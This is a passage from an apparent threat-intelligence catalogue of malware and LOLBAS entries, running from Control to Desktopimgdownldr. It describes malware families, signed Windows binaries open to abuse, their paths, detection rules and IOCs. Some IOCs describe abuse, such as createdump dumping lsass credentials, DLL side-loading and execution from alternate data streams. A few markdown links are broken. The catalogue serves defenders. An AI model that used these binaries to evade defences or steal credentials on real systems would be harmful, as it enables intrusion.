Detection: * Sigma: [proc_creation_win_exploit_cve_2021_40444.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml) * Sigma: [proc_creation_win_rundll32_susp_control_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml) * Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml) * Elastic: [defense_evasion_execution_control_panel_suspicious_args.toml](https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml) * Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml) * IOC: Control.exe executing files from alternate data streams * IOC: Control.exe executing library file without cpl extension * IOC: Suspicious network connections from control.exe<sup>[[Control.exe - LOLBAS Project](/references/d0c821b9-7d37-4158-89fa-0dabe6e06800)]</sup>

The tag is: misp-galaxy:software="Control"

CookieMiner

[CookieMiner](https://app.tidalcyber.com/software/6e2c4aef-2f69-4507-9ee3-55432d76341e) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.<sup>[[Unit42 CookieMiner Jan 2019](https://app.tidalcyber.com/references/4605c51d-b36e-4c29-abda-2a97829f6019)]</sup>

The tag is: misp-galaxy:software="CookieMiner"

coregen.exe - Associated Software

<sup>[[coregen.exe - LOLBAS Project](/references/f24d4cf5-9ca9-46bd-bd43-86b37e2a638a)]</sup>

The tag is: misp-galaxy:software="coregen.exe - Associated Software"

coregen

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.

Author: Martin Sohn Christensen

Paths: * C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe * C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe

Detection: * Sigma: [image_load_side_load_coregen.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml) * IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" * IOC: coregen.exe loading .dll file not named coreclr.dll * IOC: coregen.exe command line containing -L or -l * IOC: coregen.exe command line containing unexpected/invald assembly name * IOC: coregen.exe application crash by invalid assembly name<sup>[[coregen.exe - LOLBAS Project](/references/f24d4cf5-9ca9-46bd-bd43-86b37e2a638a)]</sup>

The tag is: misp-galaxy:software="coregen"

Sofacy - Associated Software

This designation has been used in reporting both to refer to the threat group ([APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5)) and its associated malware.<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup> <sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup><sup>[[Securelist Sofacy Feb 2018](https://app.tidalcyber.com/references/3a043bba-2451-4765-946b-c1f3bf4aea36)]</sup>

The tag is: misp-galaxy:software="Sofacy - Associated Software"

SOURFACE - Associated Software

The tag is: misp-galaxy:software="SOURFACE - Associated Software"

CORESHELL

[CORESHELL](https://app.tidalcyber.com/software/3b193f62-2b49-4eff-bdf4-501fb8a28274) is a downloader used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup> <sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup>

The tag is: misp-galaxy:software="CORESHELL"

TinyBaron - Associated Software

The tag is: misp-galaxy:software="TinyBaron - Associated Software"

BotgenStudios - Associated Software

The tag is: misp-galaxy:software="BotgenStudios - Associated Software"

NemesisGemina - Associated Software

The tag is: misp-galaxy:software="NemesisGemina - Associated Software"

CosmicDuke

The tag is: misp-galaxy:software="CosmicDuke"

CostaBricks

[CostaBricks](https://app.tidalcyber.com/software/ea9e2d19-89fe-4039-a1e0-467b14554c6f) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://app.tidalcyber.com/groups/) campaign.<sup>[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]</sup>

The tag is: misp-galaxy:software="CostaBricks"

CozyDuke - Associated Software

The tag is: misp-galaxy:software="CozyDuke - Associated Software"

CozyBear - Associated Software

The tag is: misp-galaxy:software="CozyBear - Associated Software"

Cozer - Associated Software

The tag is: misp-galaxy:software="Cozer - Associated Software"

EuroAPT - Associated Software

The tag is: misp-galaxy:software="EuroAPT - Associated Software"

CozyCar

[CozyCar](https://app.tidalcyber.com/software/c2353daa-fd4c-44e1-8013-55400439965a) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. <sup>[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]</sup>

The tag is: misp-galaxy:software="CozyCar"

CrackMapExec

[CrackMapExec](https://app.tidalcyber.com/software/47e710b4-1397-47cf-a979-20891192f313), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://app.tidalcyber.com/software/47e710b4-1397-47cf-a979-20891192f313) collects Active Directory information to conduct lateral movement through targeted networks.<sup>[[CME Github September 2018](https://app.tidalcyber.com/references/a6e1e3b4-1b69-43b7-afbe-aedb812c5778)]</sup>

The tag is: misp-galaxy:software="CrackMapExec"

Createdump.exe - Associated Software

<sup>[[Createdump.exe - LOLBAS Project](/references/f3ccacc1-3b42-4042-9a5c-f5b483a5e801)]</sup>

The tag is: misp-galaxy:software="Createdump.exe - Associated Software"

Createdump

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)

Author: mr.d0x, Daniel Santos

Paths: * C:\Program Files\dotnet\shared\Microsoft.NETCore.App*\createdump.exe * C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe * C:\Program Files\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe * C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe

Detection: * Sigma: [proc_creation_win_proc_dump_createdump.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml) * Sigma: [proc_creation_win_renamed_createdump.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml) * IOC: createdump.exe process with a command line containing the lsass.exe process id<sup>[[Createdump.exe - LOLBAS Project](/references/f3ccacc1-3b42-4042-9a5c-f5b483a5e801)]</sup>

The tag is: misp-galaxy:software="Createdump"

CredoMap

CredoMap is a credential-stealing malware developed by the Russian espionage actor APT28. The malware harvests cookies and credentials from select web browsers and exfiltrates the information via the IMAP email protocol. CredoMap was observed being used in attack campaigns in Ukraine in 2022.<sup>[[CERTFR-2023-CTI-009](/references/5365ac4c-fbb8-4389-989e-a64cb7693371)]</sup><sup>[[SecurityScorecard CredoMap September 2022](/references/3e683efc-4712-4397-8d55-4354ff7ad9f0)]</sup>

The tag is: misp-galaxy:software="CredoMap"

CreepyDrive

[CreepyDrive](https://app.tidalcyber.com/software/7f7f05c3-fbb1-475e-b672-2113709065c8) is a custom implant has been used by [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.<sup>[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]</sup>

[POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.<sup>[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]</sup>

The tag is: misp-galaxy:software="CreepyDrive"

CreepySnail

[CreepySnail](https://app.tidalcyber.com/software/11ce380c-481b-4c9b-b44e-06f1a91c01c1) is a custom PowerShell implant that has been used by [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) since at least 2022.<sup>[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]</sup>

The tag is: misp-galaxy:software="CreepySnail"

MSIL/Crimson - Associated Software

<sup>[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)]</sup>

The tag is: misp-galaxy:software="MSIL/Crimson - Associated Software"

Crimson

[Crimson](https://app.tidalcyber.com/software/3b3f296f-20a6-459a-98c5-62ebdee3701f) is a remote access Trojan that has been used by [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) since at least 2016.<sup>[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)]</sup><sup>[[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]</sup>

The tag is: misp-galaxy:software="Crimson"

CrossRAT

The tag is: misp-galaxy:software="CrossRAT"

Crutch

[Crutch](https://app.tidalcyber.com/software/e1ad229b-d750-4148-a1f3-36e767b03cd1) is a backdoor designed for document theft that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) since at least 2015.<sup>[[ESET Crutch December 2020](https://app.tidalcyber.com/references/8b2f40f5-7dca-4edf-8314-a8f5bc4831b8)]</sup>

The tag is: misp-galaxy:software="Crutch"

Cryptoistic

The tag is: misp-galaxy:software="Cryptoistic"

Csc.exe - Associated Software

<sup>[[Csc.exe - LOLBAS Project](/references/276c9e55-4673-426d-8f49-06edee2e3b30)]</sup>

The tag is: misp-galaxy:software="Csc.exe - Associated Software"

Csc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary file used by .NET to compile C# code

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe

Detection: * Sigma: [proc_creation_win_csc_susp_parent.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml) * Sigma: [proc_creation_win_csc_susp_folder.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml) * Elastic: [defense_evasion_dotnet_compiler_parent_process.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml) * Elastic: [defense_evasion_execution_msbuild_started_unusal_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml) * IOC: Csc.exe should normally not run as System account unless it is used for development.<sup>[[Csc.exe - LOLBAS Project](/references/276c9e55-4673-426d-8f49-06edee2e3b30)]</sup>

The tag is: misp-galaxy:software="Csc"

Cscript.exe - Associated Software

<sup>[[Cscript.exe - LOLBAS Project](/references/428b6223-63b7-497f-b13a-e472b4583a9f)]</sup>

The tag is: misp-galaxy:software="Cscript.exe - Associated Software"

Cscript

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used to execute scripts in Windows

Author: Oddvar Moe

Paths: * C:\Windows\System32\cscript.exe * C:\Windows\SysWOW64\cscript.exe

Detection: * Sigma: [proc_creation_win_wscript_cscript_script_exec.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml) * Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml) * Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml) * Elastic: [command_and_control_remote_file_copy_scripts.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml) * Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml) * Splunk: [wscript_or_cscript_suspicious_child_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml) * BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) * IOC: Cscript.exe executing files from alternate data streams * IOC: DotNet CLR libraries loaded into cscript.exe * IOC: DotNet CLR Usage Log - cscript.exe.log<sup>[[Cscript.exe - LOLBAS Project](/references/428b6223-63b7-497f-b13a-e472b4583a9f)]</sup>

The tag is: misp-galaxy:software="Cscript"

csi.exe - Associated Software

<sup>[[csi.exe - LOLBAS Project](/references/b810ee91-de4e-4c7b-8fa8-24dca95133e5)]</sup>

The tag is: misp-galaxy:software="csi.exe - Associated Software"

csi

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Command line interface included with Visual Studio.

Author: Oddvar Moe

Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe * c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

The tag is: misp-galaxy:software="csi"

CSPY Downloader

The tag is: misp-galaxy:software="CSPY Downloader"

Cuba

[Cuba](https://app.tidalcyber.com/software/095064c6-144e-4935-b878-f82151bc08e4) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.<sup>[[McAfee Cuba April 2021](https://app.tidalcyber.com/references/e0e86e08-64ec-48dc-91e6-24fde989cd77)]</sup>

The tag is: misp-galaxy:software="Cuba"

CustomShellHost.exe - Associated Software

<sup>[[CustomShellHost.exe - LOLBAS Project](/references/96324ab1-7eb8-42dc-b19a-fa1d9f85e239)]</sup>

The tag is: misp-galaxy:software="CustomShellHost.exe - Associated Software"

CustomShellHost

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: A host process that is used by custom shells when using Windows in Kiosk mode.

Author: Wietze Beukema

Paths: * C:\Windows\System32\CustomShellHost.exe

Detection: * IOC: CustomShellHost.exe is unlikely to run on normal workstations * Sigma: [proc_creation_win_lolbin_customshellhost.yml]([CustomShellHost.exe - LOLBAS Project(/references/96324ab1-7eb8-42dc-b19a-fa1d9f85e239)]</sup>

The tag is: misp-galaxy:software="CustomShellHost"

[Cyclops Blink](https://app.tidalcyber.com/software/68792756-7dbf-41fd-8d48-ac3cc2b52712) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.<sup>[[NCSC Cyclops Blink February 2022](https://app.tidalcyber.com/references/91ed6adf-f066-49e4-8ec7-1989bc6615a6)]</sup><sup>[[NCSC CISA Cyclops Blink Advisory February 2022](https://app.tidalcyber.com/references/bee6cf85-5cb9-4000-b82e-9e15aebfbece)]</sup><sup>[[Trend Micro Cyclops Blink March 2022](https://app.tidalcyber.com/references/64e9a24f-f386-4774-9874-063e0ebfb8e1)]</sup>

The tag is: misp-galaxy:software="Cyclops Blink"

Dacls

[Dacls](https://app.tidalcyber.com/software/9d521c18-09f0-47be-bfe5-e1bf26f7b928) is a multi-platform remote access tool used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least December 2019.<sup>[[TrendMicro macOS Dacls May 2020](https://app.tidalcyber.com/references/0ef8691d-48ae-4057-82ef-eb086c05e2b9)]</sup><sup>[[SentinelOne Lazarus macOS July 2020](https://app.tidalcyber.com/references/489c52a2-34cc-47ff-b42b-9d48f83b9e90)]</sup>

The tag is: misp-galaxy:software="Dacls"

DanBot

[DanBot](https://app.tidalcyber.com/software/131c0eb2-9191-4ccd-a2d6-5f36046a8f2f) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least 2018.<sup>[[SecureWorks August 2019](https://app.tidalcyber.com/references/573edbb6-687b-4bc2-bc4a-764a548633b5)]</sup>

The tag is: misp-galaxy:software="DanBot"

Krademok - Associated Software

The tag is: misp-galaxy:software="Krademok - Associated Software"

DarkKomet - Associated Software

The tag is: misp-galaxy:software="DarkKomet - Associated Software"

Fynloski - Associated Software

The tag is: misp-galaxy:software="Fynloski - Associated Software"

FYNLOS - Associated Software

The tag is: misp-galaxy:software="FYNLOS - Associated Software"

DarkComet

[DarkComet](https://app.tidalcyber.com/software/74f88899-56d0-4de8-97de-539b3590ab90) is a Windows remote administration tool and backdoor.<sup>[[TrendMicro DarkComet Sept 2014](https://app.tidalcyber.com/references/fb365600-4961-43ed-8292-1c07cbc530ef)]</sup><sup>[[Malwarebytes DarkComet March 2018](https://app.tidalcyber.com/references/6a765a99-8d9f-4076-8741-6415a5ab918b)]</sup>

The tag is: misp-galaxy:software="DarkComet"

DarkGate

Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).

DarkGate is a commodity downloader. Researchers have often observed DarkGate samples making use of legitimate copies of AutoIt, a freeware BASIC-like scripting language, using it to run AutoIt scripts as part of its execution chain. Reports of DarkGate infections surged following the announcement of the disruption of the QakBot botnet by international authorities in late August 2023.<sup>[[Bleeping Computer DarkGate October 14 2023](/references/313e5558-d8f9-4457-9004-810d9fa5340c)]</sup> The delivery of DarkGate payloads via instant messaging platforms including Microsoft Teams and Skype was reported in September and October 2023.<sup>[[DarkGate Loader delivered via Teams - Truesec](/references/4222a06f-9528-4076-8037-a27012c2930c)]</sup><sup>[[Trend Micro DarkGate October 12 2023](/references/81650f5b-628b-4e76-80d6-2c15cf70d37a)]</sup>

The tag is: misp-galaxy:software="DarkGate"

DarkTortilla

[DarkTortilla](https://app.tidalcyber.com/software/35abcb6b-3259-57c1-94fc-50cfd5bde786) is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. [DarkTortilla](https://app.tidalcyber.com/software/35abcb6b-3259-57c1-94fc-50cfd5bde786) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4), AsyncRat, [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), RedLine, [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6), and Metasploit.<sup>[[Secureworks DarkTortilla Aug 2022](https://app.tidalcyber.com/references/4b48cc22-55ac-5b61-b183-9008f7db37fd)]</sup>

The tag is: misp-galaxy:software="DarkTortilla"

DarkWatchman

[DarkWatchman](https://app.tidalcyber.com/software/740a0327-4caf-4d90-8b51-f3f9a4d59b37) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup>

The tag is: misp-galaxy:software="DarkWatchman"

Nioupale - Associated Software

The tag is: misp-galaxy:software="Nioupale - Associated Software"

Muirim - Associated Software

The tag is: misp-galaxy:software="Muirim - Associated Software"

Daserf

[Daserf](https://app.tidalcyber.com/software/fad65026-57c4-4d4f-8803-87178dd4b887) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. <sup>[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)]</sup> <sup>[[Secureworks BRONZE BUTLER Oct 2017](https://app.tidalcyber.com/references/c62d8d1a-cd1b-4b39-95b6-68f3f063dacf)]</sup>

The tag is: misp-galaxy:software="Daserf"

DataSvcUtil.exe - Associated Software

<sup>[[DataSvcUtil.exe - LOLBAS Project](/references/0c373780-3202-4036-8c83-f3d468155b35)]</sup>

The tag is: misp-galaxy:software="DataSvcUtil.exe - Associated Software"

DataSvcUtil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.

Author: Ialle Teixeira

Paths: * C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe

Detection: * Sigma: [proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml) * IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. * IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.<sup>[[DataSvcUtil.exe - LOLBAS Project](/references/0c373780-3202-4036-8c83-f3d468155b35)]</sup>

The tag is: misp-galaxy:software="DataSvcUtil"

DCSrv

[DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76) is destructive malware that has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) since at least September 2021. Though [DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76) has ransomware-like capabilities, [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) does not demand ransom or offer a decryption key.<sup>[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)]</sup>

The tag is: misp-galaxy:software="DCSrv"

DDKONG

The tag is: misp-galaxy:software="DDKONG"

DEADEYE.EMBED - Associated Software

The tag is: misp-galaxy:software="DEADEYE.EMBED - Associated Software"

DEADEYE.APPEND - Associated Software

The tag is: misp-galaxy:software="DEADEYE.APPEND - Associated Software"

DEADEYE

[DEADEYE](https://app.tidalcyber.com/software/e9533664-90c5-5b40-a40e-a69a2eda8bc9) is a malware launcher that has been used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) since at least May 2021. [DEADEYE](https://app.tidalcyber.com/software/e9533664-90c5-5b40-a40e-a69a2eda8bc9) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).<sup>[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]</sup>

The tag is: misp-galaxy:software="DEADEYE"

DealersChoice

The tag is: misp-galaxy:software="DealersChoice"

DEATHRANSOM

The tag is: misp-galaxy:software="DEATHRANSOM"

DefaultPack.EXE - Associated Software

<sup>[[DefaultPack.EXE - LOLBAS Project](/references/106efc3e-5816-44ae-a384-5e026e68ab89)]</sup>

The tag is: misp-galaxy:software="DefaultPack.EXE - Associated Software"

DefaultPack

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.

Author: @checkymander

Paths: * C:\Program Files (x86)\Microsoft\DefaultPack\

Detection: * Sigma: [proc_creation_win_lolbin_defaultpack.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml) * IOC: DefaultPack.EXE spawned an unknown process<sup>[[DefaultPack.EXE - LOLBAS Project](/references/106efc3e-5816-44ae-a384-5e026e68ab89)]</sup>

The tag is: misp-galaxy:software="DefaultPack"

Defender Control

Defender Control is a tool purpose-built to disable Microsoft Defender.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Defender Control"

PHOTO - Associated Software

The tag is: misp-galaxy:software="PHOTO - Associated Software"

Derusbi

[Derusbi](https://app.tidalcyber.com/software/9222aa77-922e-43c7-89ad-71067c428fb2) is malware used by multiple Chinese APT groups.<sup>[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]</sup><sup>[[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]</sup> Both Windows and Linux variants have been observed.<sup>[[Fidelis Turbo](https://app.tidalcyber.com/references/f19877f1-3e0f-4c68-b6c9-ef5b0bd470ed)]</sup>

The tag is: misp-galaxy:software="Derusbi"

Desk.cpl - Associated Software

<sup>[[Desk.cpl - LOLBAS Project](/references/487a54d9-9f90-478e-b305-bd041af55e12)]</sup>

The tag is: misp-galaxy:software="Desk.cpl - Associated Software"

Desk

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Desktop Settings Control Panel

Author: Hai Vaknin

Paths: * C:\Windows\System32\desk.cpl * C:\Windows\SysWOW64\desk.cpl

Detection: * Sigma: [file_event_win_new_src_file.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml) * Sigma: [proc_creation_win_lolbin_rundll32_installscreensaver.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml) * Sigma: [registry_set_scr_file_executed_by_rundll32.yml]([Desk.cpl - LOLBAS Project(/references/487a54d9-9f90-478e-b305-bd041af55e12)]</sup>

The tag is: misp-galaxy:software="Desk"

Desktopimgdownldr.exe - Associated Software

